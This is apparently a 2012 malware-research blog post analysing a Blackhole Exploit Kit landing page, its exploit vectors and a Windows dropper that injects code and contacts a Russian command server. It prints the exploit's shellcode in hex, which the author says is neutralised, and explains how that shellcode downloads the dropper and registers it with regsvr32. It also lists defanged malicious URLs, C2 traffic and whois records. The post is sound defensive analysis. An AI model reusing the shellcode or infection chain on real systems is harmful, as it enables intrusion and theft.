Sunday, September 16, 2012

Slight changes detected in shellcode & dropper works of Blackhole Exploit Kit (landing page: 203.91.113.6 / mothership: 146.185.220.34)

Well, currently #MalwareMustDie is in the hunting mode, so I joined the event, this is actually a report of the first case in hand which becoming an important matter in investigation of BHEK.
I received report of infection, and after looking a squid log I found the source
which is  203.91.113.6 and is "suspected" serving blackhole. 
Why I quoted that word is because I am about 95% sure of it.

Just arrived home from 6hrs driving trip, after setting freebsd for analysis mode,
setting up privoxy & tor, I am aiming at the IP I mentioned previously.
The reported url at squid log url doesn't seem to exist anymore, 
looks like the parameter was changed which was:
h00p://bode-sales.net/w.php?f=9e4b3&e=2
I tried to combine the latest blackhole possible parameters and finally managed to download the below url (via tor only..)
--21:26:28-- h00p://bode-sales.net/main.php?page=3c23940fb7350489 => `main.php@page=3c23940fb7350489' Resolving localhost (localhost)... 127.0.0.1, ::1 Connecting to localhost (localhost)|::1|:8118... connected. Resolving bode-sales.net... 203.91.113.6 Connecting to bode-sales.net|203.91.113.6|:80... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [text/html] [ <=> ] 68,856 40.80K/s 21:26:32 (40.74 KB/s) - `main.php' saved [68856] GET /main.php?page=3c23940fb7350489 HTTP/1.0 User-Agent: MalwareMustDieDieDieee/666.666.666 Accept: */* Host: bode-sales.net Connection: Keep-Alive HTTP/1.1 200 OK Server: nginx/1.3.3 Date: Sat, 15 Sep 2012 12:11:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.14 ....(blah)
The file itself is the obvious BHEK landing page obfuscated JS/Code for the research purpose I neutralized it here:-->>[PASTEBIN] And after deobfs'ed it found the Plugin Detection of blackhole - which also for the research purpose I neutralized it here:-->>[PASTEBIN] The first time I checked in Virus Total about this landing page was ZERO, now:
MD5: 88ebe56bca027174ab28406ddbafa2e6 File size: 67.2 KB ( 68856 bytes ) File name: main.php File type: HTML Detection: 4 / 42 Analysis date: 2012-09-15 17:09:47 UTC ( 0 分 ago ) URL: ---------->>[VIRUS-TOTAL] Malware Name: McAfee : JS/Exploit-Blacole.gq Symantec : Trojan.Malscript McAfee-GW-Edition : JS/Exploit-Blacole.gq Kaspersky : Trojan-Downloader.JS.Expack.adl
Like the previously reported in this blog-->[HERE] basically exploit vector of the plugin detect is unchanged, and in our case now we have 6(six) exploitations.
(The details is exactly asp per reported beforehand) 1. Java Object CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA (Gam.jar)-->[VT:1/9] 2. PDF File AcroPDF.PDF 3. DOMDocs Msxml2.XMLHTTP 4. Java Exploit javaplugin.191_40 5. Java webStart exploit JavaWebStart.isInstalled *) I thought this time is without the SWF Exploit infector A friend advised me and then I realized there is a 6. SWF Exploit (field.swf)-->[VT:20/42]
However we have the slight changes in the shellcode. I am a big fan of shellzer, a PyDbg base shellcode decoder, and using it often to many of my projects. We have a problem figuring this blog's shellcode using shellzer. So I cracked it manually, if some of you have same problem I think I am sharing this howto as reference: The above infector exploit sets the has the mission to execute the below shellcode:
41 41 41 41 66 83 e4 fc fc eb 1O 58 31 c9 66 81 e9 56fe 8O 3O 28 4O e2 fa eb O5 e8 eb ff ff ff ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3 58 34 7e a3 5e 2O 1b f3 4e a3 76 14 2b 5c 1b O4 a9 c6 3d 38 d7 d7 9O a3 68 18 eb 6e 11 2e 5d d3 af 1c Ocad cc 5d 79 c1 c3 64 79 7e a3 5d 14 a3 5c 1d 5O 2b dd 7e a3 5e O8 2b dd 1b e1 61 69 d4 85 2b ed 1b f3 27 96 38 1O da 5c 2O e9 e3 25 2b f2 68 c3 d9 13 37 5d ce 76 a3 76 Oc 2b f5 4e a3 24 63 a5 6e c4 d7 7c Oc 24 a3 fO 2b f5 a3 2c a3 2b ed 83 76 71 eb c3 7b 85 a3 4O O8 a8 55 24 1b 5c 2b be c3 db a3 4O 2O a3 df 42 2d 71 cO bO d7 d7 d7 ca d1 cO 28 28 28 28 7O 78 42 68 4O d7 28 28 28 78 ab e8 31 78 7d a3 c4 a3 76 38 ab eb 2d d7 cb 4O 47 46 28 28 4O 5d 5a 44 45 7c d7 3e ab ec 2O a3 cO cO 49 d7 d7 d7 c3 2a c3 5a a9 c4 2c 29 28 28 a5 74 Oc 24 ef 2c Oc 5a 4d 4f 5b ef 6c Oc 2c 5e 5a 1b 1a ef 6c Oc 2O O8 O5 5b O8 7b 4O dO 28 28 28 d7 7e 24 a3 cO 1b e1 79 ef 6c 35 28 5f 58 4a 5c ef 6c 35 2d O6 4c 44 44 ee 6c 35 21 28 71 a2 e9 2c 18 aO 6c 35 2c 69 79 42 28 42 28 7b 7f 42 28 d7 7e 3c ad e8 5d 3e 42 28 7b d7 7e 2c 42 28 ab c3 24 7b d7 7e 2c ab eb 24 c3 2a c3 3b 6f a8 17 28 5d d2 6f a8 17 28 5d ec 42 28 42 d6 d7 7e 2O cO b4 d6 d7 d7a6 66 26 c4 bO d6 a2 26 a1 47 29 95 1b e2 a2 73 33 ee 6e 51 1e 32 O7 58 4O 5c 5c 58 12 O7 O7 4a 47 4c 4d O5 5b 49 44 4d 5b O6 46 4d 5c O7 5f O6 58 4O 58 17 4e 15 1d 1e 4b 1f 49 Oe 4d 15 19 28 28 *) PS: the above↑shellcode is neutralized
FYI, shellzer hangs if you pasted this code. I am not going into debugging details on WHY it hangs, let's focus to the point and solve the code.. Let's dump all of the strings first, you'll get something like this:
iiiiN ..u4._3 d.@0.@ f.^< t3,.. u..4$..uQ..LQV.u<.t5x .V.v @..; u.^.^$ K.F. ....h .......XPj@h ...P. PU...^ .hon..hurlmT ...a .r.. ...\$ AQj.j.SWj. j... ?.u.G /p\X...JGLM.「IDM「.FM\._.X@X.N...K.I.M..((((
We won't know what this is all about except the looks of obfuscated URL - in the last line, so I scan it to get below signatures & info..
msf.fnstenv_mov: D9EED97424F45B817313 msf.jmp_call_additive: EB0C5E56311EAD01C3 msf.noupper: EB195E8BFE83C7008BD7 msf.shikata_ga_nai: DAD729C9B15AD97424F4 msf.single_static_bit: EB655E31ED83E10183E301 msf.countdown: FFC15E304C0E07E2FA msf.call4_dw: FFC05E81760E CCCCCC.xor: 434343434343EB0F5B33C966B9 77efe4.xor: 304500454975F9EB00 CCCC_INC_EBX_Slide: 43434343 XXXX_pop_eax_start: 58585858 7_push_PSQRVWU: 505351525657559CE8 push_user32: 68333200006855736572 push_urlmon: 686F6E00006875726C6D push_shell32: 686C333200687368656C edi_seh_k32: 33FF64FF37648927FF07EBE8 peb_k32: 64A1300000008B400C8B701C hasher.ror7: 3AD67408C1CB0703DA40 E9Eb.hasher.rol3xor: C1C20332104080380075F5 didier.hll.template: 8945F868FA8B340068884E0D00E8080000008945FC
By this I guessed the API method of urlmon.dll, and others was used to the code.. but couldn't detect any kernel32.dll API yet.. Let's skip it for a while..Now is time to bruteforce(bf) the code, you can use any tools available and try some bf logic! :-) Shortly, I got these interesting strings and fixed them:
h00p://bode-sales.net/w.php?f=56c7a&e=1 $regsvr32 -s $hwpbt$i.dll *) which further $h lead to temp dir strings & $i leads to null values so I put 0 in it.
The story is urlmon.dll is being called to download malicious file from "h00p://bode-sales.net/w.php?f=56c7a&e=1" save as %Temp%wpbt0.dll, execute, register it with "regsvr32 -s" command in your PC. Looks like we have a slight changes in shellcode API for the usage of calls from non kernel32.dll. This is different point compares to previous BHEK shellcode, So let's see what payload it is (using tor) and saved it as per malware scheme wanted it.
--2012-09-15 20:47:08-- h00p://bode-sales.net/w.php?f=56c7a Resolving localhost (localhost)... 127.0.0.1, ::1 Connecting to localhost (localhost)|::1|:8118... connected. Proxy request sent, awaiting response... 200 OK Length: 143207 (140K) [application/x-msdownload] Saving to: `wpbt0.dll' 100%[======>] 143,207 44.5K/s in 3.1s 2012-09-15 20:47:13 (44.5 KB/s) - `wpbt0.dll' saved [143207/143207]
It is a PE binary with the below analysis:
Hexing first sector: 0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ.............. 0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@....... 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0030 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 ................ 0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th 0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno 0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS 0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$....... 0080 50 45 00 00 4C 01 05 00 60 1C 53 50 00 00 00 00 PE..L...`.SP.... 0090 00 00 00 00 E0 00 0F 01 0B 01 01 32 00 EC 00 00 ...........2.... 00A0 00 42 00 00 00 00 00 00 00 10 00 00 00 10 00 00 .B.............. 00B0 00 10 01 00 00 00 40 00 00 10 00 00 00 02 00 00 ......@......... 00C0 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 ................ ↑Quick reversing it...too seek some clue.. [0x00000000:0x00400000]> d 0x00000000 (01) 4d DEC EBP 0x00000001 (01) 5a POP EDX 0x00000002 (01) 90 NOP 0x00000003 (02) 0003 ADD [EBX], AL 0x00000005 (02) 0000 ADD [EAX], AL 0x00000007 (03) 000400 ADD [EAX+EAX], AL 0x0000000a (02) 0000 ADD [EAX], AL 0x0000000c (01) ff DB 0xff 0x0000000d (02) ff00 INC DWORD [EAX] 0x0000000f (06) 00b8 00000000 ADD [EAX+0x0], BH 0x00000015 (02) 0000 ADD [EAX], AL 0x00000017 (03) 0040 00 ADD [EAX+0x0], AL : : ーーーーーtastes like a packer trace..ーーーー 0x00000034 (02) 0000 ADD [EAX], AL 0x00000036 (02) 0000 ADD [EAX], AL 0x00000038 (02) 0000 ADD [EAX], AL 0x0000003a (02) 0000 ADD [EAX], AL 0x0000003c (03) 8000 00 ADD BYTE [EAX], 0x0 0x0000003f (02) 000e ADD [ESI], CL 0x00000041 (01) 1f POP DS 0x00000042 (05) ba 0e00b409 MOV EDX, 0x9b4000e 0x00000047 (02) cd 21 INT 0x21 0x00000049 (05) b8 014ccd21 MOV EAX, 0x21cd4c01 0x0000004e (01) 54 PUSH ESP 0x0000004f (05) 68 69732070 PUSH 0x70207369 0x00000054 (02) 72 6f JB 0x000000c5 ; 1 : : PE Summary Entry Point: 0x1000 at section: .code CRC Fail: Claimed: 0 Actual: 185076 Compile Time: 0x50531C60 [Fri Sep 14 12:00:32 2012 UTC] <== NEW! Packer: PureBasic 4.x -> Neil Hodgson Compiler: Microsoft Visual C++ 5/6 Sections: .code 0x1000 0x2775 10240 .teXT 0x4000 0xc335 50176 .rdata 0x11000 0x1a0f 7168 .data 0x13000 0x1218 2560 .rsrc 0x15000 0x115c 4608 Auto reverse first block and ...got the loops :-P [0x401000L] push 0x0 [0x401005L] push 0x413998 [0x40100aL] call 0x404070L [0x40100fL] add esp 0xc [0x401014L] push 0x0 : loop : [0x401677L] call 0x4021b7L //a h*ll of a looper...anti-reverse trap, patch it! [0x40167aL] fstp st0 [0x40167fL] fild [0x413a08] [0x401681L] fmul [0x413040] [0x401687L] sub esp 0x4 [0x40168dL] fstp [esp] Calls: Complete calls listed here:--->>[PASTEBIN] With the calls summary as per below: Get system env, opening /exec files(by original C code), opening thread, using timer.bitmap object manipulation, GUI operations, using winsock, creation of TLS, creation of semaphores
↑OK, looks strange enough, let's reverse it well, I used radare2. You can use anything you like, if you reversed it correctly you'll find the below malicious API commands inside of the packed parts of the sample (tips, unpacked it first):
CopyFileW (lpExistingFileName: "%Temp%wpbt0.dll", lpNewFileName: "%ApData%\KB00725031.exe", bFailIfExists: 0x0) CreateRemoteThread (hProcess: 0x68, lpThreadAttributes: 0x0, dwStackSize: 0x0, lpStartAddress: 0x12032f0, lpParameter: 0x1200000, dwCreationFlags: 0x0, lpThreadId: 0x0)
So we have a self copy operations and foreign memory injection here. Yes, let's use sandbox to quickly confirm it:
Malicious Processes 1960 c:\test\sample.exe (wpbt0.dll) 328 c:\documents and settings\user\application data\kb00725031.exe
Yes it dropped malicious malware kb00725031.exe - and somehow I remembered this filename a while ago. I searched & found it here --->>[LINK] (It will be another story of long history for the detail of this drop) Let's continue, Virus Total detection shows this detection when I found the payload 1st time:
AntiVir : TR/Buzus.HT.11 AhnLab-V3 : Trojan/Win32.Jorik Sophos : Mal/EncPk-AFN Emsisoft : Trojan.Win32.Jorik.Foreign.AMN!A2 Kaspersky : Trojan.Win32.Jorik.Foreign.aa Microsoft : VirTool:Win32/CeeInject.gen!HT Comodo : UnclassifiedMalware
Now is becoming:
MD5: a70da3ce151ac0eb46e3a0d959cd0af3 File size: 139.9 KB ( 143207 bytes ) File name: wpbt0.dll File type: Win32 EXE Detection : 9 / 41 Analysis date: 2012-09-15 16:21:04 UTC ( 0 分 ago ) URL:-------->>>[CLICK/VIRUS-TOTAL] Malware Name: VIPRE : Trojan.Win32.Generic!BT (NEW) AntiVir : TR/Buzus.HT.11 (NEW) AhnLab-V3 : Trojan/Win32.Jorik ESET-NOD32 : a variant of Win32/Injector.WNM (NEW) Sophos : Mal/EncPk-AFN Microsoft : VirTool:Win32/CeeInject.gen!HT Symantec : Trojan.ADH.2 (NEW) Emsisoft : Trojan.Win32.Jorik.Foreign.AMN!A2 Comodo : UnclassifiedMalware
Well it supposed to connect to internet, let's carefully run it a bit :-) Well it works as per expected, & starting to communicate to mothership - in 146.185.220.34! Below is my record in UDP traffic:
Req: 00000000 00 02 01 00 00 01 00 00 00 00 00 00 13 74 75 6e ........ .....tun 00000010 69 6e 67 6c 61 6d 62 6f 73 67 6c 61 6d 6f 75 72 inglambo sglamour 00000020 02 72 75 00 00 01 00 01 .ru..... Ans: 00000000 00 02 81 80 00 01 00 01 00 00 00 00 13 74 75 6e ........ .....tun 00000010 69 6e 67 6c 61 6d 62 6f 73 67 6c 61 6d 6f 75 72 inglambo sglamour 00000020 02 72 75 00 00 01 00 01 c0 0c 00 01 00 01 00 00 .ru..... ........ 00000030 0e 0f 00 04 92 b9 dc 22 ......."
Yes, it asked for
tuninglambosglamour.ru IN A // 146.185.220.34
I bet it does some more malicious stuffs as per refered analysis above. By the way the network info of the mothership:
inetnum: 146.185.220.0 - 146.185.220.255 netname: mdsru-net descr: MDS LTD. country: RU org: ORG-Ml192-RIPE admin-c: AV6782-RIPE tech-c: VA2854-RIPE status: ASSIGNED PA mnt-by: mdsru-mnt source: RIPE # Filtered organisation: ORG-Ml192-RIPE org-name: MDS ltd. org-type: OTHER abuse-mailbox: info@mdsnet.org address: Sofia Kovalevsaja st. 22 address: 620242 Ekaterinburg address: Russian Federation mnt-ref: mdsru-mnt admin-c: AV6782-RIPE mnt-by: mdsru-mnt source: RIPE # Filtered person: Andrey Voronov address: 1st Magistralny blind alley address: 24, BC "The Yard" address: Moskow abuse-mailbox: info@mdsnet.org address: Russian Federation phone: +74957392422 nic-hdl: AV6782-RIPE mnt-by: mdsru-mnt source: RIPE # Filtered person: Vlad Abramov address: 1st Magistralny blind alley address: 24, BC "The Yard" address: Moskow abuse-mailbox: info@mdsnet.org address: Russia phone: +74957392422 nic-hdl: VA2854-RIPE mnt-by: mdsru-mnt source: RIPE # Filtered
While the landing page is in this network:
inetnum: 203.91.112.0 - 203.91.119.255 netname: G-Mobile descr: G-Mobile, Baga-Toiruu 3/9, Chingeltei district-1, descr: Ulaanbaatar 211213, Mongolia country: MN admin-c: TG154-AP tech-c: TG154-AP route: 203.91.113.0/24 descr: G-Mobile Subnet origin: AS24559 mnt-by: MAINT-MN-WIRELESSCOM changed: tulga@g-mobile.mn 20090205 source: APNIC person: Tulga Gandavaa nic-hdl: TG154-AP e-mail: tulga@g-mobile.mn address: G-Mobile Corporation, address: Chingeltei district 1st khoroo, Baga toiruu - 3/9 address: Ulaanbaatar, Mongolia phone: +976-98101111 fax-no: +976-11-311195 country: MN changed: tulga@g-mobile.mn 20070111 mnt-by: MAINT-MN-G-MOBILE ↑There are four more domains hosted in the same IP, there will be variation - of possibilities for spam links to this infector.
This cases malware family photograph:

Conclusion: The moral of this story is, the shellcode format of BHEK is starting to change. the usual kernel32.dll API based calls is becoming undetected, yet it downloaded the dropper binary containing the copy API now. Is a slight modification but it successfully fools some automation scheme. Further investigation made me realize the reason, which are written in "Bypassing Export address table Address Filter(EAF)" which can be viewed--->>[HERE] And additionally a friend advised the crash PoC of it in here -->>[HERE] Maybe shellzer must be patched for handling this new type of shellcode. I must say, maybe I missed something, since most of reversing are done manually, so please sorry about it and please advice me in the comment area. I think some more other changes in BHEK distribution is on the run too. Let's keep our eyes stick to it and see what happen. BTW, the infected urls are all up and alive so please be careful with it. Malware MUST Die!!